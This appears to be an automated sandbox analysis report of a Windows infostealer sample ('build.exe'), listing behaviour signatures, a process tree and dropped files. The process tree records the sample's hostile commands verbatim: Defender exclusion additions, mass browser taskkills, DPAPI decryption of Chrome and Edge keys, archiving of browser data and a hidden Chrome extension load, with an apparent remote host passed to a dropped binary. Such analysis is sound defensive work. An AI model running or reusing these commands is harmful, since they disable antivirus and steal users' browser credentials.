Analysis

  • user interaction
    yes
  • max time kernel
    26s
  • max time network
    49s
  • platform
    windows11-21h2_x64
  • resource
    win11-20260911-en
  • resource tags

    arch:x64arch:x86image:win11-20260911-enlocale:en-usos:windows11-21h2-x64systemwindows
  • submitted
    25/09/2026, 16:27

General

  • Target
    build.exe
  • Size 68.9MB
  • Sample260925-tx6fsaff48
  • SHA256 b5dbc4b6295e1dd86249cc954bd0d9a4a9ff815ba0237c8b06e7c0af126a19a0
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 7 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Discovers running processes 1 TTPs 4 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Executes a command shell one-liner 1 TTPs 34 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Reads the TCP/IP host and domain name from the registry 1 TTPs 8 IoCs

    The configured hostname and DNS domain identify the machine and are commonly collected to profile a host before it reports in.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 21 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    1⤵
    • Reads the TCP/IP host and domain name from the registry
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\System32\Wbem\wmic.exe
      wmic process get Name,ProcessId,ExecutablePath,CommandLine /format:csv
      2⤵
      • Reads the TCP/IP host and domain name from the registry
      • Suspicious use of AdjustPrivilegeToken
      PID:440
    • C:\Windows\system32\netstat.exe
      netstat -an
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:5132
    • C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Debugger
      2⤵
        PID:5220
      • C:\Windows\system32\reg.exe
        reg query HKLM\SOFTWARE\Classes\exefile\shell\Debug
        2⤵
        • Modifies registry key
        PID:5232
      • C:\Windows\system32\reg.exe
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        2⤵
        • Modifies registry key
        PID:1968
      • C:\Windows\system32\tasklist.exe
        tasklist /m /fi "PID eq 2132"
        2⤵
        • Discovers running processes
        • Suspicious use of AdjustPrivilegeToken
        PID:3356
      • C:\Windows\System32\Wbem\wmic.exe
        wmic process where ProcessId=3176 get Name,CommandLine,ExecutablePath /format:csv
        2⤵
        • Reads the TCP/IP host and domain name from the registry
        • Suspicious use of AdjustPrivilegeToken
        PID:3340
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); ""
        2⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); "
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Enumerates connected drives
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m50ycfjz\m50ycfjz.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3876
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB67A.tmp" "c:\Users\Admin\AppData\Local\Temp\m50ycfjz\CSC73E5B2C824D141C68AF0408AB8E8B846.TMP"
              5⤵
                PID:1060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "net session"
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:952
          • C:\Windows\system32\net.exe
            net session
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              4⤵
                PID:5012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:1732
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe
              3⤵
              • Kills process with taskkill
              PID:4024
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe
              3⤵
              • Kills process with taskkill
              PID:2452
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:4536
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe
              3⤵
              • Kills process with taskkill
              PID:2796
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b'""
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:1888
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b'"
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Enumerates connected drives
              • Suspicious behavior: EnumeratesProcesses
              PID:2384
          • C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\dwm_overlay.exe
            C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\dwm_overlay.exe C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\dwm_overlay.exe C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output FD0249FBDF88 ilovecats.sbs
            2⤵
            • Executes dropped EXE
            • Reads the TCP/IP host and domain name from the registry
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5668
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM chrome.exe
                4⤵
                • Kills process with taskkill
                PID:5628
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5672
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM msedge.exe
                4⤵
                • Kills process with taskkill
                PID:5620
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5660
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM brave.exe
                4⤵
                • Kills process with taskkill
                PID:5648
            • C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\cache.exe
              C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\cache.exe all -o C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output -v --no-kill
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:5944
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                4⤵
                  PID:6080
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                  4⤵
                    PID:1048
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output\*' -DestinationPath 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output\browserData_1790353694427.zip' -Force""
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:224
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output\*' -DestinationPath 'C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\output\browserData_1790353694427.zip' -Force"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Enumerates connected drives
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3580
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\NarratorCache\fqhcl2'""
                2⤵
                • Executes a command shell one-liner
                • Suspicious use of WriteProcessMemory
                PID:5404
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\NarratorCache\fqhcl2'"
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Enumerates connected drives
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5416
              • C:\Users\Admin\AppData\Local\NarratorCache\fqhcl2\wcindex.exe
                C:\Users\Admin\AppData\Local\NarratorCache\fqhcl2\wcindex.exe FD0249FBDF88
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:5888
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:6044
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    4⤵
                    • Discovers running processes
                    PID:4168
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAHNpCqHrbEEW+RoZXleokNRAAAAAcAAAARwBvAG8AZwBsAGUAIABDAGgAcgBvAG0AZQAAABBmAAAAAQAAIAAAAPR0bQsDHGYB7KxQ+QH9NQ9uwIz+uOOHddg8su0VI8a2AAAAAA6AAAAAAgAAIAAAAJBYk+S66Nxl710/VCzXlgEU2RUvFZ5nB7HkPmgHAUdeMAAAAGop1zW/cv0bSq01oJnwvoUm2W8tJJUdHtoYonL3499Ha/OKhSEEO4BfrG3+ZYEP0EAAAAAepEn1CMhHr5ztIISyHapSvHwlsh0wsLV1rBPWeWZ8kikApBYNe8YEDb+NhZqsg4YAJKf47AQ09aHFTKnfPOUG');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))""
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:4452
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAHNpCqHrbEEW+RoZXleokNRAAAAAcAAAARwBvAG8AZwBsAGUAIABDAGgAcgBvAG0AZQAAABBmAAAAAQAAIAAAAPR0bQsDHGYB7KxQ+QH9NQ9uwIz+uOOHddg8su0VI8a2AAAAAA6AAAAAAgAAIAAAAJBYk+S66Nxl710/VCzXlgEU2RUvFZ5nB7HkPmgHAUdeMAAAAGop1zW/cv0bSq01oJnwvoUm2W8tJJUdHtoYonL3499Ha/OKhSEEO4BfrG3+ZYEP0EAAAAAepEn1CMhHr5ztIISyHapSvHwlsh0wsLV1rBPWeWZ8kikApBYNe8YEDb+NhZqsg4YAJKf47AQ09aHFTKnfPOUG');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Enumerates connected drives
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3052
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAHNpCqHrbEEW+RoZXleokNRAAAAAeAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlAAAAEGYAAAABAAAgAAAAOAYdtnEo74Kcsms+v2W/kVkSP2/5K/MupIuDkS5c27QAAAAADoAAAAACAAAgAAAANepGcwJ+05khrdtQYp9ocLU792NklnWVZM6/qU4d6GkwAAAA/7wMjiLZV14HNG2uA8odnbuQK8ORBLHoHIbHEKN/FDlzqniA7MdUEtSr+aMvoVpfQAAAAJ1iyB3fDqgepUJvD4OEAFImvf/WLwSyXyR+UZONAwZzNV+BfSA+T9MRDMncfPXqahxqJ18wrsURsVD4nn+C2L4=');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))""
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:5244
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAHNpCqHrbEEW+RoZXleokNRAAAAAeAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlAAAAEGYAAAABAAAgAAAAOAYdtnEo74Kcsms+v2W/kVkSP2/5K/MupIuDkS5c27QAAAAADoAAAAACAAAgAAAANepGcwJ+05khrdtQYp9ocLU792NklnWVZM6/qU4d6GkwAAAA/7wMjiLZV14HNG2uA8odnbuQK8ORBLHoHIbHEKN/FDlzqniA7MdUEtSr+aMvoVpfQAAAAJ1iyB3fDqgepUJvD4OEAFImvf/WLwSyXyR+UZONAwZzNV+BfSA+T9MRDMncfPXqahxqJ18wrsURsVD4nn+C2L4=');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Enumerates connected drives
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5900
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5956
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM chrome.exe
                    4⤵
                    • Kills process with taskkill
                    PID:1552
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5572
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM msedge.exe
                    4⤵
                    • Kills process with taskkill
                    PID:5716
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4072
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM brave.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2920
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM firefox.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5780
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM firefox.exe
                    4⤵
                    • Kills process with taskkill
                    PID:5768
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM opera.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:3428
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM opera.exe
                    4⤵
                    • Kills process with taskkill
                    PID:3232
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM kometa.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5164
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM kometa.exe
                    4⤵
                    • Kills process with taskkill
                    PID:5132
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM orbitum.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:1784
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM orbitum.exe
                    4⤵
                    • Kills process with taskkill
                    PID:4736
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM centbrowser.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4980
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM centbrowser.exe
                    4⤵
                    • Kills process with taskkill
                    PID:3356
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM 7star.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:3604
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM 7star.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2216
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM sputnik.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:1236
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM sputnik.exe
                    4⤵
                    • Kills process with taskkill
                    PID:4312
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM vivaldi.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:3416
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM vivaldi.exe
                    4⤵
                    • Kills process with taskkill
                    PID:5184
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM epicprivacybrowser.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4336
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM epicprivacybrowser.exe
                    4⤵
                    • Kills process with taskkill
                    PID:3708
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM uran.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5168
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM uran.exe
                    4⤵
                    • Kills process with taskkill
                    PID:3440
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM yandex.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5200
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM yandex.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2300
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM iridium.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:404
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM iridium.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2552
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  3⤵
                  • Executes a command shell one-liner
                  PID:2540
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    4⤵
                    • Discovers running processes
                    PID:1240
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4764
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    4⤵
                    • Discovers running processes
                    PID:5084
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" "--load-extension=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Chrome" "--disable-extensions-except=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Chrome" --disable-popup-blocking --profile-directory=Default --window-position=-32000,-32000 --window-size=800,600
                  3⤵
                    PID:5292
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=140.0.7339.81 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe5980c728,0x7ffe5980c734,0x7ffe5980c740
                      4⤵
                        PID:4048
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --force-high-res-timeticks=disabled --metrics-shmem-handle=1452,i,5465041171652664259,12414027730159009840,524288 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=2132 /prefetch:11
                        4⤵
                        • System Time Discovery
                        PID:5548
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-pre-read-main-dll --force-high-res-timeticks=disabled --gpu-preferences=SAAAAAAAAADgAAAIAAAAAAAAAAAAAGAAAQAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --metrics-shmem-handle=1596,i,14378030670412147669,6037637948468059879,262144 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=1964 /prefetch:2
                        4⤵
                          PID:1696
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=2304,i,13831205578874875760,14562738790867881778,524288 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=2276 /prefetch:13
                          4⤵
                            PID:5940
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --metrics-shmem-handle=2976,i,8042802598796836231,5188820510223086307,2097152 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=2992 /prefetch:1
                            4⤵
                              PID:6052
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --metrics-shmem-handle=2960,i,6502525339196544881,17011485742898751072,2097152 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=2968 /prefetch:1
                              4⤵
                                PID:5028
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --metrics-shmem-handle=4460,i,17302588473245584053,16194521401560938298,2097152 --field-trial-handle=1980,i,15664798788681904230,798277069135036906,262144 --variations-seed-version=20260911-010032.103000-production --mojo-platform-channel-handle=4448 /prefetch:1
                                4⤵
                                  PID:5400
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PickerHost\gos4fm'""
                              2⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:1608
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PickerHost\gos4fm'"
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Enumerates connected drives
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5976
                            • C:\Users\Admin\AppData\Local\PickerHost\gos4fm\svc_model.exe
                              C:\Users\Admin\AppData\Local\PickerHost\gos4fm\svc_model.exe FD0249FBDF88
                              2⤵
                                PID:5360
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:6008
                                  • C:\Windows\System32\reg.exe
                                    C:\Windows\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
                                    4⤵
                                      PID:2848
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "wmic desktopmonitor get screenwidth,screenheight"
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:5252
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic desktopmonitor get screenwidth,screenheight
                                      4⤵
                                        PID:6124
                                • C:\Program Files\Google\Chrome\Application\140.0.7339.81\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\140.0.7339.81\elevation_service.exe"
                                  1⤵
                                    PID:5540

                                  Network

                                        MITRE ATT&CK Enterprise v16

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        binding.gyp

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\binding.gyp
                                        • Size 938B
                                        • SHA256 d093676ff7f72b93d21cd1cb809167ab2198868f990eac8ab7dd4d196f33f18d
                                        • MD5 SHA1 SHA512 TLSH

                                        index.d.ts

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\dist\index.d.ts
                                        • Size 411B
                                        • SHA256 cb781599f1fa516e89e70f9cea142fbe35df7e42e2b48cf499839b8a23e203f4
                                        • MD5 SHA1 SHA512 TLSH

                                        index.js

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\dist\index.js
                                        • Size 412B
                                        • SHA256 a7ff0225cb5ebcbef8499c6c8ac2be924f584eb375dacb1d8bd3dc6540b510f2
                                        • MD5 SHA1 SHA512 TLSH

                                        package.json

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\package.json
                                        • Size 959B
                                        • SHA256 c5eea1db47cd8be555c6b22ca68b7186974c1d6361f5f29493695072b5ef7850
